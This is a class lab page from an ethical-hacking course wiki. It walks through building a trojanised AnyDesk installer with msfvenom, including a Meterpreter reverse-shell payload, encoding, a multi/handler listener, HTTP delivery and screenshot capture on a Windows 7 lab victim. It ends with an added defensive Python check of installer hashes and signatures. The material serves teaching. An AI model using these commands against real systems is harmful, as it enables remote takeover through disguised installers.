Class 6 Lab 3 ‐ Metasploit Trojan - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Task 1: Generate a Trojan

Step 1

  • Turn on the pfSense, Kali, and Windows 7 machines. Copy the provided AnyDesk installer executable to the Kali machine for payload creation.

Step 2

  • Generate a malicious payload using msfvenom and embed a Trojan in an AnyDesk executable that will open a Meterpreter. (Msfvenom was introduced in EH-06.) The command for the payload is:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe -o GoodMalware.exe -e x86/shikata_ga_nai -i 15 --platform windows lhost=eth0 lport=4949 -x /root/Downloads/AnyDesk.exe
  • The output will be GoodMalware.exe.

Step 3

  • Set up a listener using Metasploit (introduced in EH-06) via the msfconsole for the reverse connection. Search for multi/handler, which is a generic payload handler.

Step 4

  • Set the following options: lhost as eth0 and lport as 4949. This configures the listener. Once it is created, run the exploit.
use exploit/multi/handler
set lport 4949
set lhost eth0
run

Task 2: Execution & Control

Step 1

  • In the Kali machine, open another tab and run the Python listening server with the command below. Then download the payload from the Windows 7 machine’s browser by going to the Kali machine’s IP.
python -m SimpleHTTPServer 80

Step 2

  • Execute the file, GoodMalware.exe, and note the connection that was created in the Kali terminal.

Step 3

  • Take a screenshot of the Windows 7 machine from the Meterpreter session using the screenshot command. The image is saved in the Kali home directory.
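
Seen from the download side of Task 2, any change to a vendor installer changes its SHA-256, and a file with no certificate table cannot carry an Authenticode signature. The following added example (not part of the original lab) checks both; `triage`, `sample_pe` and the sample bytes are constructed for illustration, and the vendor hash is assumed to come from the vendor's own site.

```python
import hashlib
import struct

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def has_cert_table(data: bytes) -> bool:
    """True if the PE header declares a non-empty certificate table (data directory 4)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = pe + 24                                         # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    dirs = opt + (96 if magic == 0x10B else 112)          # data directories
    if struct.unpack_from("<I", data, dirs - 4)[0] <= 4:  # NumberOfRvaAndSizes
        return False
    offset, size = struct.unpack_from("<II", data, dirs + 4 * 8)
    return size > 0 and offset + size <= len(data)

def triage(data: bytes, vendor_sha256: str) -> str:
    """Compare against the vendor's published hash, then look for a signature."""
    if sha256_hex(data) == vendor_sha256.lower():
        return "matches-vendor-hash"
    if has_cert_table(data):
        # Presence is not validity: verify with signtool or Get-AuthenticodeSignature.
        return "hash-mismatch-verify-signature"
    return "hash-mismatch-unsigned"

def sample_pe(body: bytes, cert: bytes) -> bytes:
    """Constructed minimal PE32 header for the demo; not a real installer."""
    hdr = bytearray(0x40 + 24 + 96 + 16 * 8)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x58, 0x10B)              # PE32 magic
    struct.pack_into("<I", hdr, 0x58 + 92, 16)            # NumberOfRvaAndSizes
    if cert:
        struct.pack_into("<II", hdr, 0x58 + 128, len(hdr) + len(body), len(cert))
    return bytes(hdr) + body + cert

if __name__ == "__main__":
    vendor = sample_pe(b"installer", b"CERT" * 4)
    altered = sample_pe(b"installer+extra", b"")
    for name, blob in [("vendor copy", vendor), ("altered copy", altered)]:
        print(name, "->", triage(blob, sha256_hex(vendor)))
```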